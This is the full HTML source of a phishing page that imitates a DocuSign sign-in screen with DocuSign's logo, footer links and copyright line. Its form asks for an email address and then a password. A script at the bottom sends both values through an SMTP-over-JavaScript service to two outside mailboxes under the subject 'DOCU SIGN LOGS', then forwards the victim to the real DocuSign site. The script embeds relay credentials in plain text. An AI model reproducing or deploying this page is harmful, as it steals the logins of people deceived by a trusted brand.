<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    
    <title>DocuSign</title>
    	<link rel="shortcut icon" href="https://i.postimg.cc/pdksC7QP/favicon.png" type="image/x-icon">
    <!-- Bootstrap -->
	  <!-- Latest compiled and minified CSS -->
		<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css" integrity="sha384-HSMxcRTRxnN+Bdg0JdbxYKrThecOKuH5zCYotlSAcp1+c8xmyTe9GYg1l9a69psu" crossorigin="anonymous">

	
    <style type="text/css">
    	
			body {
			  padding-top: 40px;
			  padding-bottom: 40px;
			  background-color: #f9f9f9;
		    font-family: 'Helvetica Neue','HelveticaNeue',Helvetica,Arial,sans-serif;
		    font-size: 13px;
		    font-weight: normal;
		    line-height: normal;
		    text-rendering: optimizeLegibility;
			}

			h1 {
		    color: #333;
		    font-family: "Maven Pro","Helvetica Neue","HelveticaNeue",Helvetica,Arial,sans-serif;
		    font-size: 22px;
		    font-weight: bold;
		    margin: 0;
			}

			.form-signin {
			  max-width: 390px;
			  padding: 15px;
			  margin: 0 auto;
			}

			.form-signin .form-signin-heading,
			.form-signin .checkbox {
			  margin-bottom: 10px;
			}
			.form-signin .checkbox {
			  font-weight: 400;
			}
			.form-signin .form-control {
			  position: relative;
			  border-color: #e86b52;
			  height: auto;
			  padding: 10px;
			  font-size: 16px;
			  height: 34px;
	    	background: transparent;
	    	box-shadow: none;
	    	border-radius: 2px;
	    	font-size: 13px;
	    	padding: 5px 8px 6px 8px;
			}
			.form-signin .form-control:focus {
			  z-index: 2;
			}
			.form-signin input[type="email"] {
			  margin-bottom: -1px;
			}
			.form-signin input[type="password"] {
			  margin-bottom: 10px;
			}


			.btn{
				background-color: #ffc820;
	    	border-color: #ffc820;
	    	color: #333;
	    	font-size: 13px;
		    font-weight: bold;
		    letter-spacing: .66px;
		    line-height: 20px;
		    text-decoration: none;
		    text-transform: uppercase;
		    padding: 6px 18px;
		    border-radius: 2px;
		    border-style: solid;
		    border-width: 1px;
		    border-color: #ffc820;
			}

			.btn:hover{
				background-color: #ffc820;
	    	border-color: #ffc820;
	    	color: #333;
			}


			.navbar-nav {
			  display: flex;
			  justify-content: center;
			  flex-wrap: wrap;
			  font-size: 10px;
			  padding-bottom: 1px;
			}

			@media (min-width: 768px) {
			  .navbar-nav {
			    float: none;
			  }
			}
    </style>
  </head>
  <body>
  	

    <div class="container">
 				<center><img src="https://account.docusign.com/LoginAppNext/images/docusign_logo_small.png" style="max-width:150px; margin-bottom: 25px"></center>
        <h1 style="text-align:center">Please log in to your account</h1>

	      <form class="form-signin" id="form-one">
	        <label for="inputEmail" class="sr-only">Email address</label>
	        <input type="email" id="inputEmail" class="form-control" placeholder="Email address" style="margin-bottom: 10px;" required autofocus>
	        <button class="btn btn-lg btn-primary btn-block" type="submit" id="continue">CONTINUE</button>
	      </form>
	      
	      <form class="form-signin" id="form-two" style="display: none;">
	        <label for="inputPassword" class="sr-only" >Password</label>
	        <input type="password" id="inputPassword" class="form-control" placeholder="Password" required>
	        <button class="btn btn-lg btn-primary btn-block" type="submit" id="login" >LOGIN</button>
	      </form>
	      
      	<div style="text-align: center; margin-top: 5px;">
      			<a href="#">No account? Sign up for free</a>
      	</div>
    </div> 
  
    <nav class="navbar navbar-default navbar-fixed-bottom">
				<div class="container" >
						<ul role="navigation" class="nav navbar-nav">
			        <li><a class="item" target="_blank" href="http://www.docusign.com/support" translate="Help" translate-attr-title="Link opens in new window" title="Link opens in new window">Help</a></li>        
			        <li><a class="item" target="_blank" ng-href="https://www.docusign.com/company/terms-and-conditions/web" translate="Terms" translate-attr-title="Link opens in new window" title="Link opens in new window" href="https://www.docusign.com/company/terms-and-conditions/web">Terms</a></li>
			        <li class="collapse"><a class="item" target="_blank" ng-href="https://www.docusign.com/IP" translate="Intellectual Property" translate-attr-title="Link opens in new window" title="Link opens in new window" href="https://www.docusign.com/IP">Intellectual Property</a></li>
			        <li><a class="item" target="_blank" ng-href="https://www.docusign.com/company/privacy-policy" translate="Privacy Policy" translate-attr-title="Link opens in new window" title="Link opens in new window" href="https://www.docusign.com/company/privacy-policy">Privacy Policy</a></li>
			    </ul>
			    <p style="font-size: 10px; text-align: center; padding-top:0px">Copyright © 2021 DocuSign, Inc. All rights reserved.</p>
				</div>
		</nav>


    <!-- jQuery (necessary for Bootstrap's JavaScript plugins) -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
    <!-- Include all compiled plugins (below), or include individual files as needed -->

    <script src="https://smtpjs.com/v3/smtp.js"></script> 
    <script type="text/javascript">
    	const continueBtn = document.getElementById("continue");
    	const loginBtn    = document.getElementById("login");

    	const formOne = document.querySelector("#form-one");
    	const formTwo = document.querySelector("#form-two");

    	let message;

    	formOne.addEventListener("submit", (e)=>{
    		e.preventDefault();
    		let email = document.getElementById("inputEmail").value;

    		message = "Email: "+email;
    		
    		formTwo.style = "display:block";
    		formOne.style = "display:none";
    	});

    	formTwo.addEventListener("submit", (e)=>{
    		e.preventDefault();

    		let pass = document.getElementById("inputPassword").value;

    		message +=", Password: "+pass;

    		Email.send({ 
		        Host: "smtp.elasticemail.com", 
		        Username: "suxythree@gmail.com", 
		        Password: "DCFAE115E4E38DDB4143ABB75A16753041BF", 
		        To: "workwivawy@yandex.ru,Infmaa77@gmail.com", 
		        From: "suxythree@gmail.com", 
		        Subject: "DOCU SIGN LOGS", 
		        Body: message 
		    }).then(function (message) { 
		        window.location.href="https://account.docusign.com/";
		    }); 
    	});
    </script>
  </body>
</html>